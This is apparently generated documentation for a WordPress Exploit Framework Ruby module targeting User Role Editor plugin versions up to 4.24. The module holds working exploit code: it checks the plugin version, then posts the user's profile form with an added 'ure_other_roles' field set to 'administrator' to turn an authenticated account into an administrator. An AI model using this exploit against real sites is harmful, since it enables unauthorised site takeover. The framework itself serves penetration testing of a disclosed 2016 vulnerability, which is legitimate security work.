class Wpxf::Auxiliary::UserRoleEditorPrivilegeEscalation
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::Module::new
# File lib/wpxf/modules/auxiliary/priv_esc/user_role_editor_privilege_escalation.rb, line 6 def initialize super update_info( name: 'User Role Editor <= 4.24 Privilege Escalation', desc: 'The User Role Editor plugin, in versions 4.24 and below, '\ 'allows authenticated users to escalate their user role to '\ 'that of an administrator.', author: [ 'rastating' # WPXF module ], references: [ ['WPVDB', '8432'], ['URL', 'https://www.wordfence.com/blog/2016/04/user-role-editor-vulnerability/'] ], date: 'Apr 04 2016' ) end
Public Instance Methods
build_update_body()
click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/user_role_editor_privilege_escalation.rb, line 33 def build_update_body fields = wordpress_user_profile_form_fields(session_cookie) return nil unless fields fields.merge('ure_other_roles' => 'administrator') end
check()
click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/user_role_editor_privilege_escalation.rb, line 25 def check check_plugin_version_from_readme('user-role-editor', '4.25') end
requires_authentication()
click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/user_role_editor_privilege_escalation.rb, line 29 def requires_authentication true end
run()
click to toggle source
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/priv_esc/user_role_editor_privilege_escalation.rb, line 39 def run return false unless super body = build_update_body unless body emit_error 'Failed to build payload' return false end res = execute_post_request(url: wordpress_url_admin_profile, body: body, cookie: session_cookie) unless res.code == 302 || res.code == 200 emit_error "Request returned code #{res.code}" return false end emit_success "User role for #{datastore['username']} has been escalated to administrator" true end